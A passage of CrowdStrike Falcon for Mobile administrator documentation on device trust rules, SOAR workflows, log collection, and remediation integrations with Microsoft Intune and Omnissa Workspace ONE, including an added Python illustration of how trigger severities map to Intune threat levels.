      For example, to block mobile devices that don’t have Falcon for Mobile installed, exclude the Falcon installed condition and set the rule action to Block.

  3. When a mobile user authenticates using the Identity Protection OIDC integration, the rule is applied. If the user’s mobile device is protected by Falcon for Mobile, the CrowdStrike Falcon app briefly opens with a message that the device is trusted or indicates failure if there was a problem validating the Falcon sensor installation. Depending on how the rule is configured, the user can be allowed access, blocked, or asked for additional identity verification.

Note: There are some limitations with how the Falcon sensor installation can be validated. For more info, see Limitations with mobile device trust authentication.

Configuring Falcon Fusion SOAR workflows for Falcon for Mobile

Use Fusion SOAR to define workflows that Falcon performs when specific criteria are met. These workflows can trigger based on mobile detections or Zero Trust Assessment (ZTA).

For example, your workflows could complete steps such as these:

  • Assign a user to all critical Android detections.

  • Create a ServiceNow ticket for threats that need to be escalated, such as detections associated with a particular tactic or technique.

  • Assign a particular Falcon grouping tag to mobile hosts that fail specific ZTA OS assessments.

  • Send a notification email to a distribution list if an iOS host's sensor assessment score drops below a certain number.

Note: Detection-based workflows only trigger for detections that are generated after the workflow is created. For example, suppose you create a workflow to send a notification if an Android device is rooted, but Falcon for Mobile detected a rooted device before you created the workflow. Because a rooted detection occurs only once, the workflow won’t trigger for that device.

For more info about managing workflows, see Fusion SOAR.

Create a workflow

Create a workflow for mobile detections.

  1. Go to Fusion SOAR > Fusion SOAR > Workflows.
  2. Click Create workflow.
  3. Select Create workflow from scratch and click Next.
  4. Configure the trigger.
    1. In the Add trigger panel, search for mobile detection and then expand Endpoint security.
    2. Click Detection > Mobile Detection.
    3. Click Next.
  5. Configure the condition.
    1. In the Add next panel or on the workflow canvas, select Condition icon.
    2. Configure the parameter, operator, and value. For example, to set a workflow for Android detections, select the Parameter as Platform, the Operator as is equal to, and the Value as Android.
    3. Click Next. Configure additional conditions as needed.
    4. Click Next.
  6. Configure the sequential action.
    1. In the Add next panel or on the workflow canvas, select Action icon.
    2. Configure the action. For example, to assign detections to a user, search for assign detection, click Assign detection to user and select the user.
    3. Click Next.

      The workflow appears on the canvas. For example:

      Falcon for Mobile workflow
  7. Click Save and exit.
  8. If you’d like the workflow to start immediately, set Status to On.
  9. Enter a name and optional description or output for the workflow.
  10. Click Save and exit.

Collecting application logs for troubleshooting

Application logs for Android and iOS contain important sensor events and errors to aid in troubleshooting issues with Falcon for Mobile. These logs contain messages only from the Falcon app and are separate from any system logs. Application logs rotate on a regular basis.

You can allow CrowdStrike to remotely collect application logs with the Allow remote log collection option in your mobile policies. This option is enabled by default. If a mobile device is unable to connect to the CrowdStrike cloud, you can also collect the logs locally on the device.

Enable or disable remote log collection

By default, CrowdStrike is able to remotely collect application logs from your mobile devices. You can enable or disable remote log collection on a per-policy basis.

  1. Go to Endpoint security > Configure > Mobile policies.
  2. Find the policy to configure and click Edit Policy.
  3. On the Sensor settings tab, enable or disable Allow remote log collection.

Manually share application logs from mobile devices

If a mobile device is unable to connect to the CrowdStrike cloud, you can share application logs locally using the Falcon app. You can also check the connectivity status to the CrowdStrike cloud.

  1. From the mobile device, open the CrowdStrike Falcon app.
  2. Open the diagnostic menu.
    • Android devices: Open the menu in the upper left corner and select Diagnostics.
    • iOS devices: Open the menu in the upper right corner and select Diagnostics.
  3. Tap Share Debug Logs.
    The Android or iOS share sheet opens.
  4. Select an app, action, or contact, then use that method to share the application logs.

Integrating Falcon for Mobile with Microsoft Intune for Remediation Actions

Expand the capabilities of Falcon for Mobile by integrating with Microsoft Intune (formerly Endpoint Manager).

Overview

Expand the capabilities of Falcon for Mobile with Microsoft Intune (formerly Endpoint Manager). This integration gives you greater flexibility and control over how Falcon for Mobile responds to potential threats by performing remediation actions or sending notifications to users' devices.

For example, if a user enables developer options on an Android device, you might want Falcon for Mobile to simply generate a detection for this low-severity event. If the user then goes on to gain root access to the device, Falcon for Mobile can generate a higher severity detection and notify Intune to take action, such as remotely locking the device.

Note: Falcon for Mobile supports integrating with only one MDM at a time. Do not configure both Intune and Omnissa Workspace ONE for remediation actions, as this will result in unexpected behavior.

Integration data flow

The illustration describes the high-level communication and data flow that takes place for this integration.

A workflow image showing the communication and data flow for this integration

  1. The CrowdStrike Falcon app runs on mobile devices and generates events that are sent to the Falcon cloud for processing.

  2. If Falcon finds a detection on a device, and that detection matches a configured remediation trigger, Falcon notifies Intune.

  3. Intune performs the configured noncompliance action, such as sending a notification to the user or remotely locking the device.

Requirements

Subscription: Falcon for Mobile

Default roles:

  • To configure Falcon for Mobile in the Falcon console:

    • Falcon Administrator

    • Mobile admin

  • To set up Mobile Device Management integrations in the Falcon Store:

    • Falcon Administrator

CrowdStrike clouds: Available in US-1, US-2, and EU-1

Before you begin

Before you configure this integration, make sure you deploy Falcon for Mobile to your devices. This includes creating a device group in Intune, pushing the CrowdStrike Falcon app to devices, and enrolling devices to the Falcon cloud. For iOS devices, you must also deploy a configuration profile and use zero-touch enrollment instead of manual enrollment.

Configuration overview

These high-level steps describe the general process to set up and configure this integration.

  1. Set up the integration and perform the initial configuration in Intune.

    1. Configure the Mobile Threat Defense connector, which allows Intune to connect to the Falcon cloud.

    2. Create a compliance policy. When a detection is generated that matches a remediation trigger, Intune applies any configured actions specified in the compliance policy.

    3. Configure the MDM device ID, which ensures that Falcon for Mobile and Intune are correctly identifying unique mobile devices.

  2. Complete the integration in the Falcon console. Use the CrowdStrike Store to connect Falcon to Intune and enable remediation for your mobile policies.

  3. Configure remediation triggers on a per-mobile policy basis. If a mobile device generates a detection with a configured remediation trigger, Falcon notifies Intune.

Set up Intune

Set up the integration and perform the initial configuration in Intune.

Configure the Mobile Threat Defense connector

Configure the Mobile Threat Defense connector, which allows Intune to connect to Falcon.

  1. In Intune, go to Tenant administration > Connectors and tokens > Mobile Threat Defense.

  2. Click Add.

    Adding a new connector in Intune

  3. From the connector menu, select CrowdStrike Falcon for Mobile.

    • The connector settings are enabled for Android and iOS devices by default. You can disable these settings at any time if needed.

    • You can ignore the App Sync settings as they aren’t used in this integration.

    • The connector deactivates if there is no response from CrowdStrike in 7 days by default. You can modify this setting at any time.

  4. Click Create.

Understanding compliance policies

Intune uses compliance policies to determine what action is taken when a device is determined to be noncompliant.

Consider these points when creating your compliance policies:

  • A compliance policy applies to only one device platform. If you are protecting both Android and iOS devices, you need to create a compliance policy for each.

  • The Device Threat Level determines the threshold for noncompliance. This threat level corresponds to the severities that are configured in the remediation triggers in the Falcon console. For more info, see the Microsoft article Create Mobile Threat Defense device compliance policy with Intune.

Create a compliance policy

Create a compliance policy and configure which actions to take if a device is noncompliant.

  1. In Intune, go to Devices > Compliance.

  2. Click Create Policy.

    Creating a compliance policy in Intune

  3. Configure basic settings.

    1. Select the platform.

    2. If the policy is for Android Enterprise, select the profile type.

    3. Click Create.

    4. Enter a name and optional description, and then click Next.

  4. On the Compliance Settings tab, configure device health settings.

    1. Expand Device Health.

    2. For Require the device to be at or under the Device Threat Level, select a threat level.

    3. Click Next.

  5. On the Actions for noncompliance tab, configure the actions to take when a device is no longer compliant.

    1. If you don’t want the device immediately marked as noncompliant, click Immediately and enter the time, in days, when the action will take effect.

    2. Click the Action menu and select the action to take after a device is noncompliant.

    3. If you don’t want the action to immediately take effect, schedule the time in days to take effect.

      Configuring noncompliance actions in Intune

    4. If you’re sending an email to the end user, click the links that appear in the Message template and Additional recipients columns to configure the email message and recipients.

    5. Click Next.
  6. In the Assignments tab, add the groups that contain the devices protected by Falcon for Mobile.
  7. Click Next.
  8. Click Create.

Configure the MDM device ID

This integration uses Microsoft Entra device IDs to uniquely identify devices between Falcon and Intune. This ID is specified as a dynamic variable in the configuration that Intune deploys to devices.

If you already configured the MDM device ID during your deployment of Falcon for Mobile, you can skip this step. Go to Connect Falcon to Intune.

Tip: Although you don’t need to know the individual IDs of your devices to complete this integration, you can view a device’s ID in the host’s details panel in Host Management. MDM Device ID displays the ID.

Configure the MDM device ID for Android devices

Use an app configuration policy to configure the device ID. This process varies depending on how you enroll Android devices to Falcon for Mobile.

Configure the MDM device ID for zero-touch enrollment

If you enrolled Android devices using zero-touch enrollment, add the MDM device ID to the app configuration policy that was created for enrollment.

  1. In Intune, go to Apps > App configuration policies.

  2. Open the app configuration policy that was created for enrollment.

  3. Click Properties.

  4. In the Settings area, click Edit.

  5. In the Configuration settings area, click +Add.

    Adding a new app configuration key-value pair in Intune

  6. Select MDM device ID.

    Selecting the MDM device ID key in app config in Intune

  7. Click OK.

  8. In the Configuration value field, enter: {{aaddeviceid}}

    Adding the MDM device ID value in app config in Intune

  9. Click Review + Save.

  10. Click Save.

Configure the MDM device ID for manual enrollment

If you manually enrolled Android devices to Falcon for Mobile using QR codes, add the MDM device ID to a new app configuration policy.

  1. In Intune, go to Apps > App configuration policies.

  2. Click Add > Managed devices.

    Adding a new app configuration policy in Intune

  3. Configure basic settings.

    1. Enter a name and optional description.

    2. For the platform, select Android Enterprise.

    3. Select the profile type.

    4. Click Select app.

    5. In the Associated app area, select CrowdStrike Falcon.

    6. Click OK.

    7. Click Next.

  4. In the Settings tab, configure the MDM device ID.

    1. For Configuration settings format, select Use configuration designer.

    2. Click +Add.

    3. Select MDM device ID.

      Selecting the MDM device ID in the app configuration policy

    4. Click OK.

    5. In the Configuration value text field, enter: {{aaddeviceid}}

      Adding the MDM device ID value in app config

    6. Click Next.

  5. In the Assignments tab, add the groups that contain the devices protected by Falcon for Mobile.

  6. Click Next.

  7. Click Create.

Configure the MDM device ID for iOS devices

Add the MDM device ID to the configuration profile you used to deploy Falcon for Mobile to devices. Depending on your deployment, this would be either a Content Filter profile or a Per-App VPN profile.

Configure the MDM device ID for a Content Filter profile

Because Intune doesn’t natively support Content Filter profiles, you can’t directly edit the contents of an imported Content Filter profile. Use the Falcon console to create and export a new profile that you can import to Intune.

Tip: Although using the Falcon console to export a profile is the recommended method, you can also use Apple Configurator 2. For more info, see Create a Content Filter profile with Apple Configurator 2 in the iOS deployment guide.

  1. In the Falcon console, go to Host setup and management > Deploy > Mobile enrollment.

  2. Click Enroll managed devices.

  3. Follow the on-screen instructions to configure and download the profile for iOS devices.

    • The MDM device ID is automatically configured when you select Microsoft Intune as your MDM.

    • For full instructions on configuring these settings, see Configure the profile in the Falcon console.

  4. In Intune, go to Devices > Configuration.

  5. Open the policy you used to deploy the Content Filter profile to iOS devices.

  6. Next to Configuration settings, click Edit.

  7. In the Configuration settings tab, click Select a configuration profile file.

    Uploading a Content Filter profile in Intune

  8. Select the configuration file you exported.

  9. Click Review + save.

  10. Click Save.

Configure the MDM device ID for a Per-App VPN profile

The MDM device ID must be specified as a dynamic value, but due to a limitation with Microsoft, Intune doesn’t support dynamic values in custom data settings for Per-App VPN profiles.

You can work around this by overriding the Per-App VPN profile and applying an app configuration policy to protected iOS devices.

Note: This workaround requires users to open the Falcon app on their devices after changes are applied.

  1. Add the MDM device ID to the Per-App VPN profile.

    1. In Intune, go to Devices > Configuration.

    2. Open the Per-App VPN profile used to deploy Falcon for Mobile.

    3. Next to Configuration settings, click Edit.

    4. Expand Base VPN.

    5. Configure the override setting. If you already did this to configure dynamic values for the hostname or user_email settings during deployment, you can skip this step.

      • In the Key field, enter: allow_app_config_overrides

      • In the Value field, enter: true

    6. Configure the MDM device ID.

      • In the Key field, enter: mdm_device_id

      • In the Value field, enter: {{aaddeviceid}}

        Adding the MDM device ID to the Per-App VPN profile

    7. Click Review + save, and then click Save.

  2. Go to Apps > App Configuration Policies.

  3. If you already created an app configuration policy for overriding the hostname or user_email settings, open the policy for editing.

    1. Click the name of the policy.

    2. In the Manage area, click Properties.

    3. Next to Settings, click Edit.

  4. If you didn’t create an app configuration policy during deployment, create one.

    1. Click Add > Managed devices.

    2. Configure these settings:

      • Name: A name for the policy

      • Platform: iOS/iPadOS

      • Targeted app: CrowdStrike Falcon

    3. Click Next.

    4. From the Configuration settings format menu, select Use configuration designer.

  5. Add the MDM device ID to the app configuration policy.

    1. In the Configuration key field, enter: mdm_device_id

    2. Select String as the Value type.

    3. In the Configuration value field, enter: {{aaddeviceid}}

      Configuring the MDM device ID in app config for iOS devices

  6. Save your changes.

    • If you’re creating a new policy, click Next, add the groups containing Falcon for Mobile devices, and create the policy.

    • If you’re editing a policy, click Review + save, and then click Save.

Connect Falcon to Intune

Enable the integration in the CrowdStrike Store and set up remediation triggers.

  1. In the Falcon console, go to Endpoint security > Configure > Mobile policies.

  2. Click Connect an MDM.

    Connecting to an MDM in the Mobile Policies page in the Falcon console

    The CrowdStrike Store opens.

  3. In the CrowdStrike Store, in the Mobile Device Management area, click Falcon for Mobile built for Microsoft Intune.

  4. Click Configure, and then click Save configuration.

  5. When prompted by Microsoft, select your Intune admin account.

    • This account should have the home tenant set to the tenant where the CrowdStrike Mobile Threat Defense connector was activated.

    • This account should have the Global Administrator role assigned, which is required to consent to the permissions this integration needs.

  6. Click Accept.

  7. In Falcon, click Manage Mobile Policies or go to Endpoint security > Configure > Mobile policies.

  8. In the MDM remediation setup dialog, select your Intune Tenant ID.

  9. Click Save settings.

    The Mobile policies page shows that the MDM is connected and remediation triggers are enabled.

Configure remediation triggers in Falcon

When a detection on a mobile device is found, Falcon checks to see if the detection has an associated remediation trigger. If the detection matches an active trigger, Falcon notifies Intune.

After completing remediation setup, triggers are enabled in all mobile policies. You can configure and disable individual triggers on a per-mobile policy basis.

For more info about configuring and managing mobile policies, see Managing mobile policies.

Remediation trigger considerations

Consider these points when configuring remediation triggers.

  • Any new triggers added by CrowdStrike in future releases will not be enabled by default and must be enabled manually in mobile policies.

  • To use the DebuggableFlagTurnedOn remediation trigger for Android devices, you must also enable the Currently installed apps setting in your mobile policy. For more info, see Access to sensitive data types.

Severity mapping for remediation triggers

A remediation trigger’s severity corresponds with the Device Threat Level defined in the compliance policy in Intune. This mapping isn’t completely one-to-one.

CrowdStrike remediation trigger severity   Device Threat Level mapping in Intune
Low                                        Low
Medium                                     Medium
High                                       High
Critical                                   High

Configure remediation triggers

After completing remediation setup, remediation triggers are enabled in all policies with a default configuration. You can disable individual triggers and modify trigger severity on a per-mobile policy basis.

  1. In the Falcon console, go to Endpoint security > Configure > Mobile policies.

  2. Find the policy to configure and click Edit Policy.

    Tip: You can also create a policy instead of modifying an existing one. For more info, see Create a mobile policy.

  3. Click the Remediations tab.

  4. Click the trigger you want to modify.

  5. In the Details panel, click Edit remediation trigger and perform any of these actions:

    • To enable or disable the trigger, click the Status toggle.

    • To modify the severity, use the Severity menu.

    • To reset the trigger to the default severity, click Reset to default.

  6. Click Update Setting.
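
As an added illustration (not CrowdStrike's or Microsoft's code) of how the trigger settings edited in the procedure above and the severity mapping combine with an Intune compliance policy's Device Threat Level threshold, the following Python models the path from a mobile detection to an Intune noncompliance decision. Trigger names other than DebuggableFlagTurnedOn, the NONE baseline level, and the sample policies are assumptions.

```python
"""Constructed model of the detection-to-noncompliance path for the Falcon / Intune integration.
Not CrowdStrike or Microsoft code; trigger names other than DebuggableFlagTurnedOn, the NONE
baseline level and the sample policies are assumptions made for this example."""
from dataclasses import dataclass, field
from enum import IntEnum
from typing import Dict

class ThreatLevel(IntEnum):
    """Intune Device Threat Level, ordered so '<=' means 'at or under'."""
    NONE = 0    # baseline before any detection (constructed name, not from the page)
    LOW = 1
    MEDIUM = 2
    HIGH = 3

# Severity mapping from the page: Intune has no Critical level, so Critical -> High.
SEVERITY_TO_THREAT_LEVEL: Dict[str, ThreatLevel] = {
    "Low": ThreatLevel.LOW,
    "Medium": ThreatLevel.MEDIUM,
    "High": ThreatLevel.HIGH,
    "Critical": ThreatLevel.HIGH,
}

@dataclass
class RemediationTrigger:
    """One remediation trigger as shown on a mobile policy's Remediations tab."""
    name: str
    default_severity: str
    severity: str = ""        # empty means 'use the default severity'
    enabled: bool = True      # existing triggers are enabled after remediation setup

    def __post_init__(self) -> None:
        self.severity = self.severity or self.default_severity
        if self.severity not in SEVERITY_TO_THREAT_LEVEL:
            raise ValueError(f"unknown severity {self.severity!r}")

    def reset_to_default(self) -> None:
        """'Reset to default' in the trigger's Details panel."""
        self.severity = self.default_severity

@dataclass
class MobilePolicy:
    """A Falcon mobile policy holding its own copy of the trigger settings."""
    name: str
    triggers: Dict[str, RemediationTrigger] = field(default_factory=dict)

    def add_trigger(self, trigger: RemediationTrigger, added_after_setup: bool = False) -> None:
        # Triggers CrowdStrike adds in later releases are not enabled by default.
        if added_after_setup:
            trigger.enabled = False
        self.triggers[trigger.name] = trigger

@dataclass
class CompliancePolicy:
    """An Intune compliance policy; each one applies to a single platform."""
    platform: str
    max_threat_level: ThreatLevel   # 'Require the device to be at or under the Device Threat Level'

@dataclass
class Detection:
    device_id: str      # the shared MDM device ID ({{aaddeviceid}} on the device)
    platform: str       # "Android" or "iOS"
    trigger_name: str   # detection type matched against remediation trigger names

@dataclass
class Outcome:
    notified_mdm: bool
    threat_level: ThreatLevel
    noncompliant: bool
    reason: str

def evaluate(detection: Detection, policy: MobilePolicy,
             compliance: Dict[str, CompliancePolicy], send_to_mdm: bool = True) -> Outcome:
    """Decide whether Falcon notifies Intune and whether Intune then marks the device noncompliant."""
    trigger = policy.triggers.get(detection.trigger_name)
    if trigger is None:
        return Outcome(False, ThreatLevel.NONE, False, "no remediation trigger for this detection type")
    if not trigger.enabled:
        return Outcome(False, ThreatLevel.NONE, False, f"trigger {trigger.name} is disabled in {policy.name}")
    if not send_to_mdm:
        return Outcome(False, ThreatLevel.NONE, False, "'Send remediation triggers to MDM' is off")
    level = SEVERITY_TO_THREAT_LEVEL[trigger.severity]
    cp = compliance.get(detection.platform)
    if cp is None:
        # Falcon still notifies Intune, but with no policy for the platform nothing is evaluated.
        return Outcome(True, level, False, f"no Intune compliance policy for {detection.platform}")
    noncompliant = level > cp.max_threat_level
    return Outcome(True, level, noncompliant,
                   f"{trigger.severity} -> {level.name}, threshold {cp.max_threat_level.name}")

def build_sample_policy() -> MobilePolicy:
    """Constructed mobile policy: one trigger name from the page, two assumed ones."""
    policy = MobilePolicy("Android default")
    policy.add_trigger(RemediationTrigger("DebuggableFlagTurnedOn", "Low"))
    policy.add_trigger(RemediationTrigger("RootedDevice", "Critical"))  # assumed trigger name
    policy.add_trigger(RemediationTrigger("OsOutOfDate", "Medium"), added_after_setup=True)  # assumed
    return policy

# Constructed compliance policies: one per platform, as the page requires.
SAMPLE_COMPLIANCE = {"Android": CompliancePolicy("Android", ThreatLevel.MEDIUM),
                     "iOS": CompliancePolicy("iOS", ThreatLevel.LOW)}
```

Raising a trigger's severity in one policy is enough to push a device over the Intune threshold, and Reset to default brings it back, which is why the page recommends reviewing triggers per policy.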

View non-compliant devices in Intune

If Intune determines a device is noncompliant due to a remediation trigger, the device is marked as such in the device list.

Note: It can take several minutes for compliance changes to take effect.

  1. In Intune, go to Devices > All devices.

  2. Click the Compliance column to sort the list by device compliance.

  3. Click a device name, and then click Device compliance to view more details about the device’s compliance status.

View detections in the Falcon console

All Falcon for Mobile detections, including detections associated with remediation triggers, appear in Endpoint security > Monitor > Mobile detections.

Manage the Intune integration

Modify connector settings or disable or remove the integration.

View the connector status or modify connector settings in Intune

You can view the status of the Mobile Threat Defense connector used to connect to Falcon. You can also modify connector settings, such as the response timeout or the compliance evaluation status for a specific platform.

  1. In Intune, go to Tenant administration > Connectors and tokens > Mobile Threat Defense.

    The connector list shows the status of the CrowdStrike Falcon for Mobile connector.

  2. Click the CrowdStrike connector.

  3. Modify settings as needed. The App Sync settings aren’t used and can be ignored.

  4. Click Save.

Disable the integration

If you want to disable the integration with Intune without completely removing it, you can do so in the Falcon console.

There are two options for disabling the integration.

  • Stop sending new remediation triggers to Intune. Intune will continue to apply policy to devices that are already marked as noncompliant.

  • Stop sending remediation triggers and disable the connector in Intune. Any devices that were marked as noncompliant as a result of this integration will reset in Intune and become compliant again.

  1. Go to Endpoint security > Configure > Mobile policies.

  2. Click Remediation triggers enabled.

    Disabling remediation triggers in mobile policies

  3. Disable Send remediation triggers to MDM.

  4. If you want to disable the connector, select Disable CrowdStrike connector in Microsoft Intune.

  5. Click Save settings.

Delete the integration

If you no longer want to integrate Falcon for Mobile with Intune, you can completely delete the integration in the Falcon console. Any devices that were marked as noncompliant as a result of this integration will reset in Intune and become compliant again. This also disables remediation triggers in your mobile policies.

  1. Go to Endpoint security > Configure > Mobile policies.

  2. Click MDM connected.

    Delete the integration in mobile policies

  3. Click Delete settings.

Integrating Falcon for Mobile with Omnissa Workspace ONE for Remediation Actions

Expand the capabilities of Falcon for Mobile by integrating with Omnissa Workspace ONE.

Overview

Expand the capabilities of Falcon for Mobile with Omnissa Workspace ONE. With this integration, you have greater flexibility and control over how Falcon for Mobile responds to threats. You can perform remediation actions or send notifications when a detection is triggered.

For example, if Falcon for Mobile detects that a user has turned on developer options on an Android device, you can configure Workspace ONE to merely send a notification about this low-severity action. If the user then gains root access to the device, Falcon for Mobile can generate a higher severity detection, alerting Workspace ONE to apply restrictions to the device, such as preventing outgoing calls or SMS messages.

Note: Falcon for Mobile supports integrating with only one MDM at a time. Do not configure both Workspace ONE and Microsoft Intune for remediation actions, as this will result in unexpected behavior.

Integration data flow

This illustration describes the high-level communication and data flow that takes place for this integration.

An illustration showing the communication and data flow for this integration

  1. The CrowdStrike Falcon app runs on mobile devices and generates events that are sent to Falcon.

  2. If Falcon finds a detection on a device, and that detection matches a configured remediation trigger, Falcon alerts Workspace ONE.

  3. Workspace ONE performs remediation actions, such as sending an email notification, wiping the device, or applying a more restrictive policy to the device.

Requirements

Subscription: Falcon for Mobile

Default roles:

  • To configure Falcon for Mobile in the Falcon console:

    • Falcon Administrator

    • Mobile admin

  • To set up Mobile Device Management integrations in the Falcon Store:

    • Falcon Administrator

CrowdStrike clouds: Available in US-1, US-2, and EU-1

Before you begin

Deploy Falcon for Mobile and select the organization group to use in Workspace ONE.

Deploying Falcon for Mobile

Before you configure this integration, you must deploy Falcon for Mobile to your devices. This deployment includes pushing the CrowdStrike Falcon app to devices from Workspace ONE and enrolling devices to the Falcon cloud. The enrollment process depends on your device type.

  • For Android devices, you can manually enroll users or configure zero-touch enrollment.

  • For iOS devices, you must deploy a profile that contains configuration for zero-touch enrollment. We recommend using the Enroll managed devices workflow in the Falcon console to create the profile.

For more info, see:

  • Deploying Falcon for Mobile to Android Devices

  • Deploying Falcon for Mobile to iOS Devices

Selecting the Workspace ONE organization group

The setup for this integration requires selecting an organization group in Workspace ONE. Workspace ONE uses organization groups to create a structured hierarchy for devices in your environment. Every device managed by Workspace ONE belongs to one, and only one, organization group.

If your environment contains only one organization group, select this group when setting up the integration. If you have multiple organization groups, you must select a group that has no children. Selecting a parent node isn’t supported and could cause unexpected behavior with the integration.

If you have a multi-CID environment and you’re configuring this integration for more than one CID, you must select organization groups at the same hierarchy level. We do not recommend using the same organization group for multiple CIDs.

For more info about how Workspace ONE uses organizations, see the Omnissa documentation for Organization groups.

Step 1: Connect Falcon to Workspace ONE

Configure the device unique identifier (UID) and authentication settings in Workspace ONE and provide connection information in the Falcon console.

Step 1a: Configure the device UID in Workspace ONE

This integration uses a device’s UID, specified as a dynamic value, to uniquely identify devices between Falcon and Workspace ONE.

For Android devices and iOS devices with a manually configured Content Filter or Per-App VPN profile, you must configure the UID in Workspace ONE.

If you used the Falcon console to create a custom profile type for Workspace ONE, you can skip this step. The UID configuration is included in the custom profile.

Tip: Although you don’t need to know the individual UIDs of your devices to complete this integration, you can view a device’s UID in the host’s summary panel on the Host Management page. MDM Device ID displays the UID.

Configure the device UID for Android devices

Use AppConfig to configure the device UID. If you used zero-touch enrollment, add the device UID to the assignment where you configured the key-value pairs. If you manually enrolled devices, create a new assignment.

  1. In Workspace ONE, go to Resources > Apps > Native.

  2. In the List View area, click the Public tab, and then click the Android entry for CrowdStrike Falcon.

    The CrowdStrike Falcon app as it appears in the List View area in Workspace ONE

  3. Click Assign.

    Assigning the CrowdStrike Falcon app in the Apps area of Workspace ONE

  4. Add or modify an assignment to configure the device UID.

    1. If you configured zero-touch enrollment for Falcon for Mobile, click the assignment containing zero-touch settings.

    2. If you manually enrolled your Android devices:

      1. Click Add Assignment.

      2. In the Distribution area, enter a name and select any assignment groups that contain devices protected by Falcon for Mobile.

  5. Configure the device UID.

    1. Click Application Configuration.

    2. If you created a new assignment, enable Send Configuration.

    3. Find the entry for mdm_device_id, and in the text field enter: {DeviceUid}

    4. Click Save or Create.

Configure the device UID for iOS devices

For iOS devices with a manually configured Content Filter or Per-App VPN profile, you must add the UID to this profile.

If you used the Falcon console to create a custom profile type for Workspace ONE, you can skip this step.

  1. In Workspace ONE, go to Resources > Profiles & Baselines > Profiles.
  2. Open the profile used to deploy Falcon for Mobile.
  3. Expand the configuration area. Depending on your profile type, this area is either Content Filter or VPN.
  4. In the Custom Data area, click Add.
  5. In the Key field, enter mdm_device_id.
  6. In the Value field, enter {DeviceUid}.

Step 1b: Configure authentication settings in Workspace ONE

Falcon for Mobile requires authentication credentials to connect to Workspace ONE. Although Workspace ONE supports OAuth, basic, and certificate authentication, Falcon for Mobile currently implements only OAuth and basic auth.

We recommend using OAuth when possible. OAuth uses a client ID and secret, which you configure in the OAuth Client Management area in Workspace ONE. For more info, see Configure OAuth in Workspace ONE.

If OAuth isn’t supported in your environment, such as for on-premises installations of Workspace ONE, you can use basic auth with an API key and Workspace ONE login credentials. The Workspace ONE user must have a role assigned that has editing permissions for Workspace ONE APIs. Enable basic auth and configure the API key in the REST API area of Workspace ONE. For more info, see Configure the API key in Workspace ONE.

Configure OAuth in Workspace ONE

Create the client ID and secret for Falcon to authenticate to Workspace ONE.

  1. In Workspace ONE, go to Groups & Settings > Configurations.

  2. Click OAuth Client Management.

    The OAuth Client Management entry in the Configurations area of Workspace ONE

  3. Click Add.

  4. Enter a name and description.

  5. Select the organization group that protects your devices with Falcon for Mobile.

    Note: You must select a group without children. For more info, see Selecting the Workspace ONE organization group.

  6. Select a role that has editing permissions for REST APIs.

  7. Click Save to generate the client ID and client secret.

  8. Record your API client secret somewhere safe. After closing the window, the secret is no longer visible in Workspace ONE.

  9. Click Close.

Use these credentials when configuring the connection to Workspace ONE in the Falcon console.

Configure the API key in Workspace ONE

Generate the API key for Falcon to authenticate to Workspace ONE.

  1. In Workspace ONE, go to Groups & Settings > All Settings.

  2. Select System > Advanced > API > REST API.

  3. In the General tab, make sure Enable API Access is enabled, and then click Add.

    Configuring REST API settings in Workspace ONE

  4. Enter the service name and make note of the generated API key.

  5. Click the Authentication tab.

  6. Enable Basic and click Save.

    Enabling basic authentication in Workspace ONE

Use the API key when configuring the connection to Workspace ONE in the Falcon console.

Step 1c: Configure the integration in the Falcon console

Perform the initial configuration to connect Falcon to Workspace ONE and to complete remediation setup.

Before you begin, gather this information:

Connect Falcon to Workspace ONE

Use the Connect an MDM workflow to complete remediation setup. This enables remediation triggers for all of your mobile policies.

  1. In the Falcon console, go to Endpoint security > Configure > Mobile policies.

  2. Click Connect an MDM.

    The Mobile policies page

    The CrowdStrike Store opens.

  3. Select Workspace ONE.

  4. Click Configure.

  5. Click Add configuration.

  6. In the API URL field, enter the REST API URL of your Workspace ONE instance.

  7. Select the authentication type and enter the credentials you created in Workspace ONE.

    • OAuth 2.0 Client Credential: Enter the client ID, client secret, and token URL.

    • Basic Auth: Enter the API key and a username and password used to log in to Workspace ONE. The user must have a role assigned that has editing permissions for REST APIs.

  8. Click Save configuration.

  9. Complete the remediation setup.

    1. Click Manage Mobile Policies or go to Endpoint security > Configure > Mobile policies.

      The MDM remediation setup window opens.

    2. From the Organization group menu, select the organization in Workspace ONE that contains devices protected by Falcon for Mobile.

    3. Make sure that Send remediation triggers to MDM is turned on.

    4. Click Save settings.

Step 2: Configure remediation triggers in Falcon

When a detection on a mobile device is found, Falcon checks to see whether the detection has an associated and enabled remediation trigger. If the detection matches an active trigger, Falcon notifies Workspace ONE with the detection type and configured severity.

After completing remediation setup, triggers are enabled in all policies. You can configure and disable individual triggers on a per-mobile policy basis. For more info about configuring and managing mobile policies, see Managing mobile policies.

Remediation trigger considerations

Consider these points when configuring remediation triggers.

  • Any new triggers added by CrowdStrike in future releases will not be enabled by default and must be enabled manually in mobile policies.

  • To use the DebuggableFlagTurnedOn remediation trigger for Android devices, you must also enable the Currently installed apps setting in your mobile policy. For more info, see Access to sensitive data types.

Configure remediation triggers

After completing remediation setup, remediation triggers are enabled in all policies with a default configuration. You can disable individual triggers and modify trigger severity on a per-mobile policy basis.

  1. In the Falcon console, go to Endpoint security > Configure > Mobile policies.

  2. Find the policy to configure and click Edit Policy.

    Tip: Alternatively, you can create a policy instead. For more info, see Create a mobile policy.
  3. Click the Remediations tab.

  4. Click the trigger you want to modify.

  5. In the Details panel, click Edit remediation trigger and perform any of these actions:

    • To enable or disable the trigger, click the Status toggle.

    • To modify the severity, use the Severity menu.

    • To reset the trigger to the default severity, click Reset to default.

  6. Click Update Setting.

Step 3: Configure remediation actions in Workspace ONE

After you complete the initial integration setup, Falcon creates tags in Workspace ONE. Use these tags in compliance policies, which you can configure to send notifications or apply remediation actions to devices with matching tags.

How Workspace ONE uses tags to identify devices

Workspace ONE uses tags to identify devices based on a particular attribute. After you complete the workflow to set up remediation in the Falcon console, Falcon automatically creates 2 sets of tags in Workspace ONE in the organization group you selected.

  • Detection tags align with the detections in the remediation triggers. For each enabled remediation trigger in Falcon, there’s an equivalent detection tag in Workspace ONE.

  • Severity tags correspond to severities configured in your remediation triggers. There are 4 severity tags: low, medium, high, and critical.

When a device generates a detection with a remediation trigger, Falcon instructs Workspace ONE to apply the related detection tag and, if needed, the related severity tag.

Note: All tags created by this integration are prefixed with CRWD_. For example, the tag for a severity of high is named CRWD_SeverityHigh.

Severity tag aggregation

Although a device can have multiple detection tags assigned, only one severity tag can be assigned to a device at a time. Falcon instructs Workspace ONE to assign the highest severity belonging to the currently assigned detection tags.

For example, a device might have these 2 active detections:

  • Root access detected, with a severity of critical

